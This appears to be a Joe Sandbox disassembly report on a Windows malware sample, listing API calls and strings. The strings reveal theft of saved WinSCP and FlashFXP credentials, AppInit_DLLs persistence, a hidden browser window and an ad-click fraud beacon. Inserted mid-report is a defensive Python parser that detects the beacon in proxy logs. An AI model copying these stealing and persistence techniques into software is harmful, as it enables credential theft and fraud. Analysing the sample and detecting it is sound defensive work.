                          • Instruction Fuzzy Hash: AF516D72D0010CABDB10DAA1DC85FDF77BCEB44305F1044BBE515F2181EA789B898B65
                          APIs
                            • Part of subcall function 004058FB: _memset.LIBCMT ref: 0040591C
                          • GetModuleFileNameW.KERNEL32(00000000,00420840,00001000), ref: 00402EC3
                          • GetCurrentDirectoryW.KERNEL32(00001000,00420840), ref: 00402EDC
                          • GetLastError.KERNEL32(?), ref: 00402F4E
                          • GetLastError.KERNEL32 ref: 00403237
                          • GetLastError.KERNEL32(?), ref: 00403258
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: ErrorLast$CurrentDirectoryFileModuleName_memset
                          • String ID: .html$From: $Via: $^client=$^key=$file$none
                          • API String ID: 2247176544-3749385445
                          • Opcode ID: 79cd1330f744164cc704132905a94fc592a0dfc2489d9d56cff5d063718bdc77
                          • Instruction ID: 295a2e83bb6b363340795eecc9968ea2d400926a6410b4e4a91bd94f8c6abde8
                          • Opcode Fuzzy Hash: 79cd1330f744164cc704132905a94fc592a0dfc2489d9d56cff5d063718bdc77
                          • Instruction Fuzzy Hash: 01B17E72A001199BCB24EF61CD91AEB77A9EF44304F4040BFF519E7291EA389A858F59
                          APIs
                          • HeapAlloc.KERNEL32(00000008,00000C20,?,00000000,00000008), ref: 00404542
                          • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?), ref: 004045DA
                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00404605
                          • RegCloseKey.ADVAPI32(?), ref: 0040476D
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AllocCloseEnumHeapOpen
                          • String ID: SOFTWARE\martin prikryl\winscp 2\sessions$ftp://%s:%s@%s:%u$hostname$password$portnumber$username
                          • API String ID: 3497950970-285550827
                          • Opcode ID: 83023a017879fb9d364fb3a00f065a4bae95062c392e5dad8cefd1387496df25
                          • Instruction ID: 619369561540f7679ee4dce6ffb5b1aea82e2176e3673c83278f81db5409ea06
                          • Opcode Fuzzy Hash: 83023a017879fb9d364fb3a00f065a4bae95062c392e5dad8cefd1387496df25
                          • Instruction Fuzzy Hash: AE715DB2900119AFDB10DBD5CD81AEF77BCEB48308F10447AE605F3291EB389E458B68
                          APIs
                          • CharLowerW.USER32(?,?,?,?,?,?,+@,004089CD,?,?,?), ref: 0040933E
                          • SysFreeString.OLEAUT32(?), ref: 00409359
                          • SysFreeString.OLEAUT32(?), ref: 00409362
                          • SysAllocString.OLEAUT32(?), ref: 004093B8
                          • SysAllocString.OLEAUT32(javascript), ref: 004093C1
                          • SysFreeString.OLEAUT32(00000000), ref: 004093E3
                          • SysFreeString.OLEAUT32(00000000), ref: 004093E6
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: String$Free$Alloc$CharLower
                          • String ID: http:$javascript$+@
                          • API String ID: 1987340527-3375436608
                          • Opcode ID: 713b06055eefad9f5422e5b9f5fb5af6d58bbbe1ec79e9ea68907389bd6c3b4b
                          • Instruction ID: 0b4048b57b081e67726dd44363989906ad2532c65c6ed0c60c908aefe346602b
                          • Opcode Fuzzy Hash: 713b06055eefad9f5422e5b9f5fb5af6d58bbbe1ec79e9ea68907389bd6c3b4b
                          • Instruction Fuzzy Hash: 6A310A71A00119AFDB04DFA6C889EAEB7B8EF48314B144469E805EB291D775AD41CF64
                          APIs
                          • DeleteFileW.KERNEL32(00000000,771B0F00), ref: 00407043
                          • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000004,00000080,00000000), ref: 0040705D
                          • GetLastError.KERNEL32(00000000), ref: 00407079
                          • SetEndOfFile.KERNEL32(00000000), ref: 0040708F
                          • InternetOpenUrlW.WININET(00000000,00000001,00000000,80000000,00000000,00000000), ref: 004070A9
                          • CloseHandle.KERNEL32(00000000), ref: 004070BB
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$CloseCreateDeleteErrorHandleInternetLastOpen
                          • String ID:
                          • API String ID: 3711279109-0
                          • Opcode ID: 89bc675b35fb8e2eee68dc50edc98837eed05b9f43fe5ca330cba4f7d07cf5ae
                          • Instruction ID: 9d8a11a16b3c0a9aa44c9dcc38c8aa686dfb91ece0f3f59227d733df7bad94bb
                          • Opcode Fuzzy Hash: 89bc675b35fb8e2eee68dc50edc98837eed05b9f43fe5ca330cba4f7d07cf5ae
                          • Instruction Fuzzy Hash: 48313471800119EFEB119FA1DE85AEE7BBDFB04344F104872F652B61A0D731AE21DB66
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Sleep
                          • String ID: .html$CsM$From: $Via: $^key=$ftp$hOA
                          • API String ID: 3472027048-2333287219
                          • Opcode ID: d8c307949237e19763c5e60e3dec01313537889ddc644ade6cf88722956defec
                          • Instruction ID: 3376cbd9a830c5581772f61034da1910d267ee329a165acd0f4726bddbbbde03
                          • Opcode Fuzzy Hash: d8c307949237e19763c5e60e3dec01313537889ddc644ade6cf88722956defec
                          • Instruction Fuzzy Hash: 4E419431A0091887CB24E7A29D529EF73A9EF40318F54407FE905B71D1EA7C9E898F5D
                          APIs
                          • VariantClear.OLEAUT32(00000016), ref: 00408E7A
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: ClearVariant
                          • String ID: _self$http$+@
                          • API String ID: 1473721057-3317424838
                          • Opcode ID: d8f59335e3977134d7c78f43a1f56087f7ef2e3c30fa3fc2b5598e0363074b87
                          • Instruction ID: ae9540e34d1dd6ebd4224328a85202065bb39baa52f6123ff81f2465f468f74f
                          • Opcode Fuzzy Hash: d8f59335e3977134d7c78f43a1f56087f7ef2e3c30fa3fc2b5598e0363074b87
                          • Instruction Fuzzy Hash: 6C913D75A00209EFDB00DFA5C988DAEB7B9FF88305B144569E845FB290DB359D41CFA4
                          APIs
                          • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00420840,?,00000000,?,004032CE,00420840,?,00000000,?,?,0040B182), ref: 00406B2A
                            • Part of subcall function 004069C0: RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000,7686E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                            • Part of subcall function 004069C0: RegCloseKey.KERNELBASE(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                          • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,?,004032CE,00420840,?,00000000,?,?,0040B182,?,0040B320,00000000), ref: 00406B8C
                          • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000), ref: 00406C17
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Open$CloseQueryValue
                          • String ID: CLSID$SOFTWARE\Classes\MIME\Database\Content Type\$application/x-javascript$text/html$text/javascript
                          • API String ID: 3546245721-1332223170
                          • Opcode ID: a4b16fbb25d38b57ee4efe956d64624d2281db9512bb134eed98189875e02577
                          • Instruction ID: b356448af2dda310db5a41c348b39e69e2b2ee30590ea213815e442ef4722270
                          • Opcode Fuzzy Hash: a4b16fbb25d38b57ee4efe956d64624d2281db9512bb134eed98189875e02577
                          • Instruction Fuzzy Hash: 0A4142B2650118AAEB10D6519E81BEB73FCEB44309F1144BBE705F2080FB789F598F69
                          APIs
                          • SysAllocString.OLEAUT32(eventConn), ref: 0040A18D
                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0040A1D4
                          • SetParent.USER32(00000000,00000000), ref: 0040A1E2
                          • GetWindowLongW.USER32(00000000,000000EC), ref: 0040A1ED
                          • SetWindowLongW.USER32(00000000,000000EC,00000000), ref: 0040A1FE
                          • SetWindowPos.USER32(00000000,00000001,00001388,00001388,00000010,?,00000000), ref: 0040A21E
                            • Part of subcall function 0040A0B5: CoInitialize.OLE32(00000000), ref: 0040A0C0
                            • Part of subcall function 0040A0B5: GetModuleHandleW.KERNEL32(00000000,00000000,?,?,0040A16F,00427ED0,00000000,00000001,?,00402806,?), ref: 0040A0CE
                            • Part of subcall function 0040A0B5: CreateWindowExW.USER32(00000000,AtlAxWin,Shell.Explorer,80000000,00000000,00000000,000004B0,00000320,00000000,00000000,00000000), ref: 0040A0F3
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Window$Long$AllocCreateFindHandleInitializeModuleParentString
                          • String ID: Shell_TrayWnd$eventConn
                          • API String ID: 2141107913-3455059086
                          • Opcode ID: 2066f8b397b36b8e779d0438fd1e5f75721f75fac11e843927efdeb34d7bad55
                          • Instruction ID: 39c15930e577ecb7297998fc23ff8408fdcdb7101606cb16b0d9d8475b405f16
                          • Opcode Fuzzy Hash: 2066f8b397b36b8e779d0438fd1e5f75721f75fac11e843927efdeb34d7bad55
                          • Instruction Fuzzy Hash: 05216834900214EFDB10AFA4CD89FAB7BB9EF0A311F2046B5F901EA2A1C7755D54CB96
                          APIs
                          • CreateWaitableTimerW.KERNEL32(00000000,00000001,00000000), ref: 00407374
                          • GetLocalTime.KERNEL32(?), ref: 00407387
                          • GetLocalTime.KERNEL32(?), ref: 0040738D
                          • GetTimeZoneInformation.KERNEL32(?), ref: 004073C2
                          • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 00407412
                          • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 0040741C
                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,00989680,00000000), ref: 0040747A
                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00989680,00000000), ref: 00407485
                          • CloseHandle.KERNEL32(?,?,?,00989680,00000000), ref: 0040748E
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Time$FileLocalSystemTimerWaitable$CloseCreateHandleInformationObjectSingleWaitZone
                          • String ID:
                          • API String ID: 3166187867-0
                          • Opcode ID: 8616424921b6ce0bb56b9c9dfbc93343bf37786535cdacee7c7c77324956f8a5
                          • Instruction ID: 26b14636c49f8a61fb06fac8b942a3fa68f3078aba47330515a101c34858e503
                          • Opcode Fuzzy Hash: 8616424921b6ce0bb56b9c9dfbc93343bf37786535cdacee7c7c77324956f8a5
                          • Instruction Fuzzy Hash: 8B316FB2D1022DAACF04EBE5DD459EEB7BDEF44304F10406AF901B3290E7746A04DB69
                          APIs
                            • Part of subcall function 0040848F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                          • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 004037AD
                          • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?), ref: 00403804
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: EnvironmentExpandFolderOpenPathStrings
                          • String ID: #$&$*flashfxp*$SOFTWARE\FlashFXP\3$datafolder
                          • API String ID: 1994525040-4055253781
                          • Opcode ID: b5df530147ac8d267a5cbfcc016f1ae2a019a33deaf43a82b22308bd25093abb
                          • Instruction ID: b84aa35a929ccb2802933dbb7828156d7819aaa5c632eb2dc8c8e19af11b7673
                          • Opcode Fuzzy Hash: b5df530147ac8d267a5cbfcc016f1ae2a019a33deaf43a82b22308bd25093abb
                          • Instruction Fuzzy Hash: 203130B2900118AADB10EAA5DC85DDF7BBCEB44718F10847BF605F3180EA399B458B69
                          APIs
                          • SysAllocString.OLEAUT32(?), ref: 004099EB
                          • SysAllocString.OLEAUT32(?), ref: 004099F9
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AllocString
                          • String ID: </domain>$</url>$<domain>$<url>$http://
                          • API String ID: 2525500382-924421446
                          • Opcode ID: 7723bc74f96afd5ab7d25efc8bb6f2b50cbe860e07765de9200aa53f481fba3f
                          • Instruction ID: c36137c4092f7a01c2c9ac5e3109157182881aca1e17db191de13133e2ad13bf
                          • Opcode Fuzzy Hash: 7723bc74f96afd5ab7d25efc8bb6f2b50cbe860e07765de9200aa53f481fba3f
                          • Instruction Fuzzy Hash: D521D876600218A6DB61AB59CC41BDB33E4FB44794F14407FE508B32C2EB785E4D4F99
                          APIs
                          • SysFreeString.OLEAUT32(75C0F6A0), ref: 00408F82
                          • SysFreeString.OLEAUT32(0000000B), ref: 00409046
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: FreeString
                          • String ID:
                          • API String ID: 3341692771-0
                          • Opcode ID: f1232823454a9de15ab73cfed205648ff3cd14be94bb6ef3f987156c3e0446fe
                          • Instruction ID: f0e6d8e47a3946ab2c5de92fa7688d846ddd73d58da4f3d2da06902102303575
                          • Opcode Fuzzy Hash: f1232823454a9de15ab73cfed205648ff3cd14be94bb6ef3f987156c3e0446fe
                          • Instruction Fuzzy Hash: A0616C70A0020AEFDB10DFA9DA845AEBBB2FB48304F2048BAD545F7251D7795E52DF08
                          APIs
                            • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                          • Sleep.KERNEL32(00002710,00000000,00000400,00000000), ref: 0040ACAE
                          • Sleep.KERNEL32(0000EA60), ref: 0040AD76
                          • Sleep.KERNEL32(00002710), ref: 0040ADA4
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Sleep$AttemptConnectInternet
                          • String ID: 0$^rcn=1$d$hOA$job^rev=%s^os=%s
                          • API String ID: 362191241-2593661552
                          • Opcode ID: c6d12f3f342631a53f4ba21eed34aabb8925de89328c1543a1445e18d084db7e
                          • Instruction ID: b79182b1151443badf469ae5f9ae195c128285790c89deda34db11c37ea10ffc
                          • Opcode Fuzzy Hash: c6d12f3f342631a53f4ba21eed34aabb8925de89328c1543a1445e18d084db7e
                          • Instruction Fuzzy Hash: 0531C471D00208ABCF20ABA6DC859AE77BAEF80309F10847BE505B72C1DA7849558B5B
                          APIs
                          • SysFreeString.OLEAUT32(?), ref: 004088E4
                          • SysFreeString.OLEAUT32(?), ref: 004088E9
                          • SysFreeString.OLEAUT32(?), ref: 004089D3
                          • SysFreeString.OLEAUT32(?), ref: 004089D8
                          • SysFreeString.OLEAUT32(?), ref: 004089F3
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: FreeString
                          • String ID: +@
                          • API String ID: 3341692771-3835504741
                          • Opcode ID: 93f0afddb38b81210f93c4942281d01229e6bb84a740b12f8f50e9dc1a7fc491
                          • Instruction ID: a3ddab01b40b0bc50fc9c7e4bf61c95a679aea40eaf3a0ce7d8bcb6f132c7745
                          • Opcode Fuzzy Hash: 93f0afddb38b81210f93c4942281d01229e6bb84a740b12f8f50e9dc1a7fc491
                          • Instruction Fuzzy Hash: BB518171900219AFDF05BFA1CC45AEF7BB8EF08308F00447AF855B6192EB799A51CB59
                          APIs
                          • SysFreeString.OLEAUT32(?), ref: 004094E6
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: FreeString
                          • String ID:
                          • API String ID: 3341692771-0
                          • Opcode ID: 99a964074df9a43e7876bfa78059f63c2205d652b6a4e0ea0b2e4f8e9ecac31d
                          • Instruction ID: b8745a711dcf8da59f3798694fa3079dcf63c40c9cdbadd59c4d39193402e254
                          • Opcode Fuzzy Hash: 99a964074df9a43e7876bfa78059f63c2205d652b6a4e0ea0b2e4f8e9ecac31d
                          • Instruction Fuzzy Hash: C9214832A00108BBDB01DFAADC44B9E7BB8EF48345F1484B6E805F71A1D774AE41DB84
                          APIs
                          • _memset.LIBCMT ref: 0040A26B
                          • SysAllocString.OLEAUT32(?), ref: 0040A28E
                          • SysAllocString.OLEAUT32(?), ref: 0040A296
                          • SysFreeString.OLEAUT32(00000000), ref: 0040A2CA
                          • SysFreeString.OLEAUT32(?), ref: 0040A2CF
                            • Part of subcall function 00409FB1: GetTickCount.KERNEL32 ref: 00409FCE
                            • Part of subcall function 00409FB1: GetTickCount.KERNEL32 ref: 00409FDE
                            • Part of subcall function 00409FB1: Sleep.KERNEL32(00000064,?,?,0040A442,?,?), ref: 00409FEC
                            • Part of subcall function 00409FB1: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409FFB
                            • Part of subcall function 00409FB1: DispatchMessageW.USER32(?), ref: 0040A009
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: String$AllocCountFreeMessageTick$DispatchPeekSleep_memset
                          • String ID: J(@
                          • API String ID: 3143865713-2848800318
                          • Opcode ID: 68495801366515c75ff4f7091ec1779cfaae467043e456767ef3efc9e03748a3
                          • Instruction ID: bfa1c3e5fdaec5be4dfb18607c12502589e7fd5433bac8caf4aacda455aa0499
                          • Opcode Fuzzy Hash: 68495801366515c75ff4f7091ec1779cfaae467043e456767ef3efc9e03748a3
                          • Instruction Fuzzy Hash: 3A118F72D10219ABCB00DFA9DD448DEBBB9FF08354B11456AF415B7290E770AE14CFA4
                          APIs
                          • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows NT\CurrentVersion\Windows,00000000,00000001,?,?,00000000), ref: 00408628
                          • GetLastError.KERNEL32(?,00000000), ref: 0040864A
                            • Part of subcall function 004069C0: RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000,7686E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                            • Part of subcall function 004069C0: RegCloseKey.KERNELBASE(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                          • DeleteFileW.KERNEL32(C:\WINDOWS\system32\gbdwpbm.dll,?,00000000), ref: 00408687
                            • Part of subcall function 004069FD: RegCreateKeyExW.ADVAPI32(0040EA48,00000000,00000000,00000000,00000000,00020006,00000000,00000002,0040EA48,?,?,?,?,00406AD3,80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current), ref: 00406A22
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CloseCreateDeleteErrorFileLastOpenQueryValue
                          • String ID: AppInit_DLLs$C:\WINDOWS\system32\gbdwpbm.dll$Software\Microsoft\Windows NT\CurrentVersion\Windows
                          • API String ID: 4026185228-3265104503
                          • Opcode ID: b4fb547f36a341d56e63cd8c3141924342823e6c0e28cdd89059e7ce4998d0d2
                          • Instruction ID: 1689b80d2e7b4165945397198c320d7ed833f5e108bfbebac4dfc06446509e60
                          • Opcode Fuzzy Hash: b4fb547f36a341d56e63cd8c3141924342823e6c0e28cdd89059e7ce4998d0d2
                          • Instruction Fuzzy Hash: 99014CB2A44124B6E62067665E06F9B72AC9B00750F220D7BF905F31C0DABA9D1446AD
                          APIs
                          • SysAllocString.OLEAUT32(?), ref: 00409B00
                          • SysAllocString.OLEAUT32(?), ref: 00409B0E
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AllocString
                          • String ID: </title>$</url>$<title>$<url>
                          • API String ID: 2525500382-2286408829
                          • Opcode ID: accc4c2b32817054c02e480ca82d26facf4490b578c9b74d600f9b3addd9539d
                          • Instruction ID: e94fff7a9c4556839c155ffec7726d55edf757161a42396596b5093e86978141
                          • Opcode Fuzzy Hash: accc4c2b32817054c02e480ca82d26facf4490b578c9b74d600f9b3addd9539d
                          • Instruction Fuzzy Hash: 4F01DB7564021CA7DB116A55CC41FD637A8BB44799F044077FA04F32C3E978AA0C4BA4
                          APIs
                            • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                          • Sleep.KERNEL32(00002710,?,?,?,?,00402C8F,00000032,00000000,00000000,00000000,00000000,?), ref: 0040A91C
                          • Sleep.KERNEL32(00002710), ref: 0040AAC1
                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040AAE9
                          • HeapFree.KERNEL32(00000000), ref: 0040AAF0
                          Strings
                          • 0, xrefs: 0040AA5B
                          • jstat^rev=%s^code=%s^site=%s^searches=%s^clicks=%s^adver=%s^os=%s, xrefs: 0040A957
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: HeapSleep$AttemptConnectFreeInternetProcess
                          • String ID: 0$jstat^rev=%s^code=%s^site=%s^searches=%s^clicks=%s^adver=%s^os=%s
                          • API String ID: 3713053250-1268808612
                          • Opcode ID: b149150f67450d10939e037a4072d5df3dc9b6793fc6db3c061519f1f12da8b2
                          • Instruction ID: cb73c9a78e41fc00613c6eff30345c36a412e41c8c720ed22b53be089701fd16
                          • Opcode Fuzzy Hash: b149150f67450d10939e037a4072d5df3dc9b6793fc6db3c061519f1f12da8b2
                          • Instruction Fuzzy Hash: 88515072A00218A6CF10EB95DC959DF737DEF44308F40447BF406B7281EB789A958FAA
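The string at 0040A957, `jstat^rev=%s^code=%s^site=%s^searches=%s^clicks=%s^adver=%s^os=%s`, is the check-in record this function builds after the InternetAttemptConnect subcall, with a 10 000 ms Sleep (0x2710) between attempts: a caret-separated, fixed-order list of key=value fields whose names (searches, clicks, adver) point to ad-click statistics being reported back. A parser for that format, plus a scan over proxy log lines, is a practical way to confirm a host is talking to the operator. The code below is an added example, not code from the report or from the sample; the log lines are constructed for illustration, the host name is a placeholder, and the handling of a percent-encoded caret (%5E) in a URL is my assumption about how the record appears in a GET query rather than something the report states.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import unquote

# Field order is fixed by the format string seen at 0040A957 in the report.
BEACON_PREFIX = "jstat"
BEACON_FIELDS = ("rev", "code", "site", "searches", "clicks", "adver", "os")
FIELD_SEP = "^"


def parse_beacon(payload: str) -> Optional[Dict[str, str]]:
    """Parse one 'jstat^rev=..^code=..' record; return None if it is not this format."""
    parts = payload.split(FIELD_SEP)
    if len(parts) != 1 + len(BEACON_FIELDS) or parts[0] != BEACON_PREFIX:
        return None
    record: Dict[str, str] = {}
    for expected, part in zip(BEACON_FIELDS, parts[1:]):
        key, sep, value = part.partition("=")
        if not sep or key != expected:
            return None  # wrong key name or no '=': not the record we know
        record[key] = value
    return record


# Cheap pre-filter for log lines; the caret may be raw or URL-encoded as %5E.
_BEACON_RE = re.compile(r"jstat(?:\^|%5[eE])rev=", re.IGNORECASE)


def find_beacons(log_lines: List[str]) -> List[Dict[str, str]]:
    """Scan proxy/IDS lines and return every parsed beacon with its source line."""
    hits: List[Dict[str, str]] = []
    for line in log_lines:
        m = _BEACON_RE.search(line)
        if not m:
            continue
        token = line[m.start():].split()[0]  # request token up to the next whitespace
        token = unquote(token).split("&", 1)[0]  # undo URL encoding, drop trailing params
        record = parse_beacon(token)
        if record is not None:
            record["_line"] = line
            hits.append(record)
    return hits


# Constructed sample lines (not real traffic): one beacon, one malformed decoy, one noise line.
SAMPLE_LOG = [
    "2024-12-06T10:00:00Z 10.0.0.7 GET http://example.invalid/?jstat%5Erev=3%5Ecode=ab12"
    "%5Esite=3%5Esearches=15%5Eclicks=4%5Eadver=2%5Eos=6.1 200",
    "2024-12-06T10:00:01Z 10.0.0.7 GET http://example.invalid/s?jstat^rev=3^code=ab12^bogus=1 404",
    "2024-12-06T10:00:02Z 10.0.0.9 GET http://example.invalid/index.html 200",
]

if __name__ == "__main__":
    for hit in find_beacons(SAMPLE_LOG):
        print({k: v for k, v in hit.items() if k != "_line"})
```

The strict field-order check matters: a loose "contains jstat^" rule would also fire on the decoy line, whereas `parse_beacon` only accepts records that match the exact template compiled into the sample, so the `code` and `site` values it returns can be used directly as campaign identifiers when correlating hosts.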
                          APIs
                          • GetLocalTime.KERNEL32(?,?), ref: 004074AD
                          • GetLocalTime.KERNEL32(00000000), ref: 004074B3
                          • GetTimeZoneInformation.KERNEL32(?), ref: 004074EA
                          • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 00407525
                          • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 0040752F
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040754A
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Time$FileLocalSystem$InformationUnothrow_t@std@@@Zone__ehfuncinfo$??2@
                          • String ID:
                          • API String ID: 3777474486-0
                          • Opcode ID: dc75d57b0fd5e0fdd9494c9f665b53f3e55cd7f2b0e9017e93342081d6970c63
                          • Instruction ID: c9ff0a62426275c5a0d4f0aa0fa2549fa158b312224671bef63f429b7f92df75
                          • Opcode Fuzzy Hash: dc75d57b0fd5e0fdd9494c9f665b53f3e55cd7f2b0e9017e93342081d6970c63
                          • Instruction Fuzzy Hash: 03112C72D1022DAADF00EBD4DC44AEEB7FCBF48314F04445AE901B7240E7B9A608CBA5
                          APIs
                          • CoInitialize.OLE32(00000000), ref: 0040A0C0
                          • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,0040A16F,00427ED0,00000000,00000001,?,00402806,?), ref: 0040A0CE
                          • CreateWindowExW.USER32(00000000,AtlAxWin,Shell.Explorer,80000000,00000000,00000000,000004B0,00000320,00000000,00000000,00000000), ref: 0040A0F3
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CreateHandleInitializeModuleWindow
                          • String ID: AtlAxWin$Shell.Explorer
                          • API String ID: 950422046-1300462704
                          • Opcode ID: e9b6661190c81bdf072f7cb3f1dc159ab5559684b807faa4a04e62d0e94038f2
